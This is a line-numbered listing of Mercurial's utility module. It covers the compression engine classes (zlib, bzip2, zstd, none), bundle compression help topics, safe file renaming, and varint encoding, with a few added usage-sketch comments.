3426 3426 if not engine.available():
3427 3427 raise error.Abort(_('compression engine %s could not be loaded') %
3428 3428 engine.name())
3429 3429 return engine
3430 3430
3431 3431 def forrevlogheader(self, header):
3432 3432 """Obtain a compression engine registered to a revlog header.
3433 3433
3434 3434 Will raise KeyError if the revlog header value isn't registered.
3435 3435 """
3436 3436 return self._engines[self._revlogheaders[header]]
3437 3437
3438 3438 compengines = compressormanager()
3439 3439
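# Illustrative sketch (not part of the original module): once the engines
# defined below have been registered, callers obtain them through this
# global manager, e.g.:
#
#   engine = compengines.forbundletype('GZ')     # by internal bundle id
#   engine = compengines.forbundlename('gzip')   # by bundle spec name
#   data = b''.join(engine.compressstream(iter([b'some data'])))
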
3440 3440 class compressionengine(object):
3441 3441 """Base class for compression engines.
3442 3442
3443 3443 Compression engines must implement the interface defined by this class.
3444 3444 """
3445 3445 def name(self):
3446 3446 """Returns the name of the compression engine.
3447 3447
3448 3448 This is the key the engine is registered under.
3449 3449
3450 3450 This method must be implemented.
3451 3451 """
3452 3452 raise NotImplementedError()
3453 3453
3454 3454 def available(self):
3455 3455 """Whether the compression engine is available.
3456 3456
3457 3457 The intent of this method is to allow optional compression engines
3458 3458 that may not be available in all installations (such as engines relying
3459 3459 on C extensions that may not be present).
3460 3460 """
3461 3461 return True
3462 3462
3463 3463 def bundletype(self):
3464 3464 """Describes bundle identifiers for this engine.
3465 3465
3466 3466 If this compression engine isn't supported for bundles, returns None.
3467 3467
3468 3468 If this engine can be used for bundles, returns a 2-tuple of strings of
3469 3469 the user-facing "bundle spec" compression name and an internal
3470 3470 identifier used to denote the compression format within bundles. To
3471 3471 exclude the name from external usage, set the first element to ``None``.
3472 3472
3473 3473 If bundle compression is supported, the class must also implement
3474 3474         ``compressstream`` and ``decompressorreader``.
3475 3475
3476 3476 The docstring of this method is used in the help system to tell users
3477 3477 about this engine.
3478 3478 """
3479 3479 return None
3480 3480
3481 3481 def wireprotosupport(self):
3482 3482 """Declare support for this compression format on the wire protocol.
3483 3483
3484 3484 If this compression engine isn't supported for compressing wire
3485 3485 protocol payloads, returns None.
3486 3486
3487 3487 Otherwise, returns ``compenginewireprotosupport`` with the following
3488 3488 fields:
3489 3489
3490 3490 * String format identifier
3491 3491 * Integer priority for the server
3492 3492 * Integer priority for the client
3493 3493
3494 3494 The integer priorities are used to order the advertisement of format
3495 3495 support by server and client. The highest integer is advertised
3496 3496 first. Integers with non-positive values aren't advertised.
3497 3497
3498 3498 The priority values are somewhat arbitrary and only used for default
3499 3499 ordering. The relative order can be changed via config options.
3500 3500
3501 3501 If wire protocol compression is supported, the class must also implement
3502 3502 ``compressstream`` and ``decompressorreader``.
3503 3503 """
3504 3504 return None
3505 3505
3506 3506 def revlogheader(self):
3507 3507 """Header added to revlog chunks that identifies this engine.
3508 3508
3509 3509 If this engine can be used to compress revlogs, this method should
3510 3510 return the bytes used to identify chunks compressed with this engine.
3511 3511 Else, the method should return ``None`` to indicate it does not
3512 3512 participate in revlog compression.
3513 3513 """
3514 3514 return None
3515 3515
3516 3516 def compressstream(self, it, opts=None):
3517 3517 """Compress an iterator of chunks.
3518 3518
3519 3519 The method receives an iterator (ideally a generator) of chunks of
3520 3520 bytes to be compressed. It returns an iterator (ideally a generator)
3521 3521         of chunks of bytes representing the compressed output.
3522 3522
3523 3523 Optionally accepts an argument defining how to perform compression.
3524 3524 Each engine treats this argument differently.
3525 3525 """
3526 3526 raise NotImplementedError()
3527 3527
3528 3528 def decompressorreader(self, fh):
3529 3529 """Perform decompression on a file object.
3530 3530
3531 3531 Argument is an object with a ``read(size)`` method that returns
3532 3532         compressed data. Return value is an object with a ``read(size)``
3533 3533         method that returns uncompressed data.
3534 3534 """
3535 3535 raise NotImplementedError()
3536 3536
3537 3537 def revlogcompressor(self, opts=None):
3538 3538 """Obtain an object that can be used to compress revlog entries.
3539 3539
3540 3540 The object has a ``compress(data)`` method that compresses binary
3541 3541 data. This method returns compressed binary data or ``None`` if
3542 3542 the data could not be compressed (too small, not compressible, etc).
3543 3543 The returned data should have a header uniquely identifying this
3544 3544 compression format so decompression can be routed to this engine.
3545 3545 This header should be identified by the ``revlogheader()`` return
3546 3546 value.
3547 3547
3548 3548 The object has a ``decompress(data)`` method that decompresses
3549 3549 data. The method will only be called if ``data`` begins with
3550 3550 ``revlogheader()``. The method should return the raw, uncompressed
3551 3551 data or raise a ``RevlogError``.
3552 3552
3553 3553 The object is reusable but is not thread safe.
3554 3554 """
3555 3555 raise NotImplementedError()
3556 3556
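# Illustrative sketch (not part of the original module): a hypothetical
# third-party engine only needs ``name()`` plus the methods for the
# contexts it supports. A bundle-only engine might look like:
#
#   class _myengine(compressionengine):
#       def name(self):
#           return 'myengine'
#       def bundletype(self):
#           """Docstring used by the bundle compression help topic."""
#           return 'myengine', 'MY'
#       def compressstream(self, it, opts=None):
#           return it   # a real engine would yield compressed chunks
#       def decompressorreader(self, fh):
#           return fh
#
#   compengines.register(_myengine())
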
3557 3557 class _zlibengine(compressionengine):
3558 3558 def name(self):
3559 3559 return 'zlib'
3560 3560
3561 3561 def bundletype(self):
3562 3562 """zlib compression using the DEFLATE algorithm.
3563 3563
3564 3564 All Mercurial clients should support this format. The compression
3565 3565 algorithm strikes a reasonable balance between compression ratio
3566 3566         and speed.
3567 3567 """
3568 3568 return 'gzip', 'GZ'
3569 3569
3570 3570 def wireprotosupport(self):
3571 3571 return compewireprotosupport('zlib', 20, 20)
3572 3572
3573 3573 def revlogheader(self):
3574 3574 return 'x'
3575 3575
3576 3576 def compressstream(self, it, opts=None):
3577 3577 opts = opts or {}
3578 3578
3579 3579 z = zlib.compressobj(opts.get('level', -1))
3580 3580 for chunk in it:
3581 3581 data = z.compress(chunk)
3582 3582 # Not all calls to compress emit data. It is cheaper to inspect
3583 3583             # here than to feed empty chunks through the generator.
3584 3584 if data:
3585 3585 yield data
3586 3586
3587 3587 yield z.flush()
3588 3588
3589 3589 def decompressorreader(self, fh):
3590 3590 def gen():
3591 3591 d = zlib.decompressobj()
3592 3592 for chunk in filechunkiter(fh):
3593 3593 while chunk:
3594 3594 # Limit output size to limit memory.
3595 3595 yield d.decompress(chunk, 2 ** 18)
3596 3596 chunk = d.unconsumed_tail
3597 3597
3598 3598 return chunkbuffer(gen())
3599 3599
3600 3600 class zlibrevlogcompressor(object):
3601 3601 def compress(self, data):
3602 3602 insize = len(data)
3603 3603 # Caller handles empty input case.
3604 3604 assert insize > 0
3605 3605
3606 3606 if insize < 44:
3607 3607 return None
3608 3608
3609 3609 elif insize <= 1000000:
3610 3610 compressed = zlib.compress(data)
3611 3611 if len(compressed) < insize:
3612 3612 return compressed
3613 3613 return None
3614 3614
3615 3615 # zlib makes an internal copy of the input buffer, doubling
3616 3616 # memory usage for large inputs. So do streaming compression
3617 3617 # on large inputs.
3618 3618 else:
3619 3619 z = zlib.compressobj()
3620 3620 parts = []
3621 3621 pos = 0
3622 3622 while pos < insize:
3623 3623 pos2 = pos + 2**20
3624 3624 parts.append(z.compress(data[pos:pos2]))
3625 3625 pos = pos2
3626 3626 parts.append(z.flush())
3627 3627
3628 3628 if sum(map(len, parts)) < insize:
3629 3629 return ''.join(parts)
3630 3630 return None
3631 3631
3632 3632 def decompress(self, data):
3633 3633 try:
3634 3634 return zlib.decompress(data)
3635 3635 except zlib.error as e:
3636 3636                 raise error.RevlogError(_('revlog decompress error: %s') %
3637 3637                                         pycompat.bytestr(e))
3638 3638
3639 3639 def revlogcompressor(self, opts=None):
3640 3640 return self.zlibrevlogcompressor()
3641 3641
3642 3642 compengines.register(_zlibengine())
3643 3643
3644 3644 class _bz2engine(compressionengine):
3645 3645 def name(self):
3646 3646 return 'bz2'
3647 3647
3648 3648 def bundletype(self):
3649 3649 """An algorithm that produces smaller bundles than ``gzip``.
3650 3650
3651 3651 All Mercurial clients should support this format.
3652 3652
3653 3653 This engine will likely produce smaller bundles than ``gzip`` but
3654 3654 will be significantly slower, both during compression and
3655 3655 decompression.
3656 3656
3657 3657 If available, the ``zstd`` engine can yield similar or better
3658 3658 compression at much higher speeds.
3659 3659 """
3660 3660 return 'bzip2', 'BZ'
3661 3661
3662 3662 # We declare a protocol name but don't advertise by default because
3663 3663 # it is slow.
3664 3664 def wireprotosupport(self):
3665 3665 return compewireprotosupport('bzip2', 0, 0)
3666 3666
3667 3667 def compressstream(self, it, opts=None):
3668 3668 opts = opts or {}
3669 3669 z = bz2.BZ2Compressor(opts.get('level', 9))
3670 3670 for chunk in it:
3671 3671 data = z.compress(chunk)
3672 3672 if data:
3673 3673 yield data
3674 3674
3675 3675 yield z.flush()
3676 3676
3677 3677 def decompressorreader(self, fh):
3678 3678 def gen():
3679 3679 d = bz2.BZ2Decompressor()
3680 3680 for chunk in filechunkiter(fh):
3681 3681 yield d.decompress(chunk)
3682 3682
3683 3683 return chunkbuffer(gen())
3684 3684
3685 3685 compengines.register(_bz2engine())
3686 3686
3687 3687 class _truncatedbz2engine(compressionengine):
3688 3688 def name(self):
3689 3689 return 'bz2truncated'
3690 3690
3691 3691 def bundletype(self):
3692 3692 return None, '_truncatedBZ'
3693 3693
3694 3694 # We don't implement compressstream because it is hackily handled elsewhere.
3695 3695
3696 3696 def decompressorreader(self, fh):
3697 3697 def gen():
3698 3698 # The input stream doesn't have the 'BZ' header. So add it back.
3699 3699 d = bz2.BZ2Decompressor()
3700 3700 d.decompress('BZ')
3701 3701 for chunk in filechunkiter(fh):
3702 3702 yield d.decompress(chunk)
3703 3703
3704 3704 return chunkbuffer(gen())
3705 3705
3706 3706 compengines.register(_truncatedbz2engine())
3707 3707
3708 3708 class _noopengine(compressionengine):
3709 3709 def name(self):
3710 3710 return 'none'
3711 3711
3712 3712 def bundletype(self):
3713 3713 """No compression is performed.
3714 3714
3715 3715 Use this compression engine to explicitly disable compression.
3716 3716 """
3717 3717 return 'none', 'UN'
3718 3718
3719 3719     # Clients always support uncompressed payloads. Servers don't advertise
3720 3720     # it by default because, unless you are on a fast network, uncompressed
3721 3721     # payloads can easily saturate your network pipe.
3722 3722 def wireprotosupport(self):
3723 3723 return compewireprotosupport('none', 0, 10)
3724 3724
3725 3725 # We don't implement revlogheader because it is handled specially
3726 3726 # in the revlog class.
3727 3727
3728 3728 def compressstream(self, it, opts=None):
3729 3729 return it
3730 3730
3731 3731 def decompressorreader(self, fh):
3732 3732 return fh
3733 3733
3734 3734 class nooprevlogcompressor(object):
3735 3735 def compress(self, data):
3736 3736 return None
3737 3737
3738 3738 def revlogcompressor(self, opts=None):
3739 3739 return self.nooprevlogcompressor()
3740 3740
3741 3741 compengines.register(_noopengine())
3742 3742
3743 3743 class _zstdengine(compressionengine):
3744 3744 def name(self):
3745 3745 return 'zstd'
3746 3746
3747 3747 @propertycache
3748 3748 def _module(self):
3749 3749 # Not all installs have the zstd module available. So defer importing
3750 3750 # until first access.
3751 3751 try:
3752 3752 from . import zstd
3753 3753 # Force delayed import.
3754 3754 zstd.__version__
3755 3755 return zstd
3756 3756 except ImportError:
3757 3757 return None
3758 3758
3759 3759 def available(self):
3760 3760 return bool(self._module)
3761 3761
3762 3762 def bundletype(self):
3763 3763 """A modern compression algorithm that is fast and highly flexible.
3764 3764
3765 3765 Only supported by Mercurial 4.1 and newer clients.
3766 3766
3767 3767 With the default settings, zstd compression is both faster and yields
3768 3768 better compression than ``gzip``. It also frequently yields better
3769 3769 compression than ``bzip2`` while operating at much higher speeds.
3770 3770
3771 3771 If this engine is available and backwards compatibility is not a
3772 3772 concern, it is likely the best available engine.
3773 3773 """
3774 3774 return 'zstd', 'ZS'
3775 3775
3776 3776 def wireprotosupport(self):
3777 3777 return compewireprotosupport('zstd', 50, 50)
3778 3778
3779 3779 def revlogheader(self):
3780 3780 return '\x28'
3781 3781
3782 3782 def compressstream(self, it, opts=None):
3783 3783 opts = opts or {}
3784 3784 # zstd level 3 is almost always significantly faster than zlib
3785 3785 # while providing no worse compression. It strikes a good balance
3786 3786 # between speed and compression.
3787 3787 level = opts.get('level', 3)
3788 3788
3789 3789 zstd = self._module
3790 3790 z = zstd.ZstdCompressor(level=level).compressobj()
3791 3791 for chunk in it:
3792 3792 data = z.compress(chunk)
3793 3793 if data:
3794 3794 yield data
3795 3795
3796 3796 yield z.flush()
3797 3797
3798 3798 def decompressorreader(self, fh):
3799 3799 zstd = self._module
3800 3800 dctx = zstd.ZstdDecompressor()
3801 3801 return chunkbuffer(dctx.read_from(fh))
3802 3802
3803 3803 class zstdrevlogcompressor(object):
3804 3804 def __init__(self, zstd, level=3):
3805 3805 # Writing the content size adds a few bytes to the output. However,
3806 3806 # it allows decompression to be more optimal since we can
3807 3807 # pre-allocate a buffer to hold the result.
3808 3808 self._cctx = zstd.ZstdCompressor(level=level,
3809 3809 write_content_size=True)
3810 3810 self._dctx = zstd.ZstdDecompressor()
3811 3811 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3812 3812 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3813 3813
3814 3814 def compress(self, data):
3815 3815 insize = len(data)
3816 3816 # Caller handles empty input case.
3817 3817 assert insize > 0
3818 3818
3819 3819 if insize < 50:
3820 3820 return None
3821 3821
3822 3822 elif insize <= 1000000:
3823 3823 compressed = self._cctx.compress(data)
3824 3824 if len(compressed) < insize:
3825 3825 return compressed
3826 3826 return None
3827 3827 else:
3828 3828 z = self._cctx.compressobj()
3829 3829 chunks = []
3830 3830 pos = 0
3831 3831 while pos < insize:
3832 3832 pos2 = pos + self._compinsize
3833 3833 chunk = z.compress(data[pos:pos2])
3834 3834 if chunk:
3835 3835 chunks.append(chunk)
3836 3836 pos = pos2
3837 3837 chunks.append(z.flush())
3838 3838
3839 3839 if sum(map(len, chunks)) < insize:
3840 3840 return ''.join(chunks)
3841 3841 return None
3842 3842
3843 3843 def decompress(self, data):
3844 3844 insize = len(data)
3845 3845
3846 3846 try:
3847 3847 # This was measured to be faster than other streaming
3848 3848 # decompressors.
3849 3849 dobj = self._dctx.decompressobj()
3850 3850 chunks = []
3851 3851 pos = 0
3852 3852 while pos < insize:
3853 3853 pos2 = pos + self._decompinsize
3854 3854 chunk = dobj.decompress(data[pos:pos2])
3855 3855 if chunk:
3856 3856 chunks.append(chunk)
3857 3857 pos = pos2
3858 3858 # Frame should be exhausted, so no finish() API.
3859 3859
3860 3860 return ''.join(chunks)
3861 3861 except Exception as e:
3862 3862                 raise error.RevlogError(_('revlog decompress error: %s') %
3863 3863                                         pycompat.bytestr(e))
3864 3864
3865 3865 def revlogcompressor(self, opts=None):
3866 3866 opts = opts or {}
3867 3867 return self.zstdrevlogcompressor(self._module,
3868 3868 level=opts.get('level', 3))
3869 3869
3870 3870 compengines.register(_zstdengine())
3871 3871
3872 3872 def bundlecompressiontopics():
3873 3873     """Obtains the available bundle compressions for use in help, keyed by name."""
3874 3874 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3875 3875 items = {}
3876 3876
3877 3877 # We need to format the docstring. So use a dummy object/type to hold it
3878 3878 # rather than mutating the original.
3879 3879 class docobject(object):
3880 3880 pass
3881 3881
3882 3882 for name in compengines:
3883 3883 engine = compengines[name]
3884 3884
3885 3885 if not engine.available():
3886 3886 continue
3887 3887
3888 3888 bt = engine.bundletype()
3889 3889 if not bt or not bt[0]:
3890 3890 continue
3891 3891
3892 3892 doc = pycompat.sysstr('``%s``\n %s') % (
3893 3893 bt[0], engine.bundletype.__doc__)
3894 3894
3895 3895 value = docobject()
3896 3896 value.__doc__ = doc
3897 3897 value._origdoc = engine.bundletype.__doc__
3898 3898 value._origfunc = engine.bundletype
3899 3899
3900 3900 items[bt[0]] = value
3901 3901
3902 3902 return items
3903 3903
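# Illustrative sketch (not part of the original module): on a default
# install the returned mapping is keyed by user-facing bundle spec names.
#
#   sorted(bundlecompressiontopics())
#   # -> ['bzip2', 'gzip', 'none'], plus 'zstd' where the module is available
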
3904 3904 i18nfunctions = bundlecompressiontopics().values()
3905 3905
3906 3906 # convenient shortcut
3907 3907 dst = debugstacktrace
3908 3908
3909 3909 def safename(f, tag, ctx, others=None):
3910 3910 """
3911 3911     Generate a name that is safe to rename f to in the given context.
3912 3912
3913 3913 f: filename to rename
3914 3914 tag: a string tag that will be included in the new name
3915 3915 ctx: a context, in which the new name must not exist
3916 3916 others: a set of other filenames that the new name must not be in
3917 3917
3918 3918 Returns a file name of the form oldname~tag[~number] which does not exist
3919 3919 in the provided context and is not in the set of other names.
3920 3920 """
3921 3921 if others is None:
3922 3922 others = set()
3923 3923
3924 3924 fn = '%s~%s' % (f, tag)
3925 3925 if fn not in ctx and fn not in others:
3926 3926 return fn
3927 3927 for n in itertools.count(1):
3928 3928 fn = '%s~%s~%s' % (f, tag, n)
3929 3929 if fn not in ctx and fn not in others:
3930 3930 return fn
3931 3931
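# Illustrative sketch (not part of the original module), treating ``ctx``
# as a plain set of existing filenames:
#
#   safename('foo', 'tag', {'foo'})             # -> 'foo~tag'
#   safename('foo', 'tag', {'foo', 'foo~tag'})  # -> 'foo~tag~1'
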
3932 3932 def readexactly(stream, n):
3933 3933 '''read n bytes from stream.read and abort if less was available'''
3934 3934 s = stream.read(n)
3935 3935 if len(s) < n:
3936 3936 raise error.Abort(_("stream ended unexpectedly"
3937 3937 " (got %d bytes, expected %d)")
3938 3938 % (len(s), n))
3939 3939 return s
3940 3940
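# Illustrative sketch (not part of the original module):
#
#   from io import BytesIO
#   readexactly(BytesIO(b'abcdef'), 4)   # -> b'abcd'
#   readexactly(BytesIO(b'ab'), 4)       # raises error.Abort
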
3941 3941 def uvarintencode(value):
3942 3942 """Encode an unsigned integer value to a varint.
3943 3943
3944 3944 A varint is a variable length integer of 1 or more bytes. Each byte
3945 3945 except the last has the most significant bit set. The lower 7 bits of
3946 3946     each byte stores the 2's complement representation, least significant group
3947 3947 first.
3948 3948
3949 3949 >>> uvarintencode(0)
3950 3950 '\\x00'
3951 3951 >>> uvarintencode(1)
3952 3952 '\\x01'
3953 3953 >>> uvarintencode(127)
3954 3954 '\\x7f'
3955 3955 >>> uvarintencode(1337)
3956 3956 '\\xb9\\n'
3957 3957 >>> uvarintencode(65536)
3958 3958 '\\x80\\x80\\x04'
3959 3959 >>> uvarintencode(-1)
3960 3960 Traceback (most recent call last):
3961 3961 ...
3962 3962 ProgrammingError: negative value for uvarint: -1
3963 3963 """
3964 3964 if value < 0:
3965 3965 raise error.ProgrammingError('negative value for uvarint: %d'
3966 3966 % value)
3967 3967 bits = value & 0x7f
3968 3968 value >>= 7
3969 3969 bytes = []
3970 3970 while value:
3971 3971 bytes.append(pycompat.bytechr(0x80 | bits))
3972 3972 bits = value & 0x7f
3973 3973 value >>= 7
3974 3974 bytes.append(pycompat.bytechr(bits))
3975 3975
3976 3976 return ''.join(bytes)
3977 3977
3978 3978 def uvarintdecodestream(fh):
3979 3979 """Decode an unsigned variable length integer from a stream.
3980 3980
3981 3981 The passed argument is anything that has a ``.read(N)`` method.
3982 3982
3983 3983 >>> try:
3984 3984 ... from StringIO import StringIO as BytesIO
3985 3985 ... except ImportError:
3986 3986 ... from io import BytesIO
3987 3987 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3988 3988 0
3989 3989 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3990 3990 1
3991 3991 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3992 3992 127
3993 3993 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3994 3994 1337
3995 3995 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3996 3996 65536
3997 3997 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3998 3998 Traceback (most recent call last):
3999 3999 ...
4000 4000 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4001 4001 """
4002 4002 result = 0
4003 4003 shift = 0
4004 4004 while True:
4005 4005 byte = ord(readexactly(fh, 1))
4006 4006 result |= ((byte & 0x7f) << shift)
4007 4007 if not (byte & 0x80):
4008 4008 return result
4009 4009 shift += 7
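
# Illustrative round-trip sketch (not part of the original module):
#
#   from io import BytesIO
#   for value in (0, 1, 127, 128, 1337, 65536):
#       assert uvarintdecodestream(BytesIO(uvarintencode(value))) == value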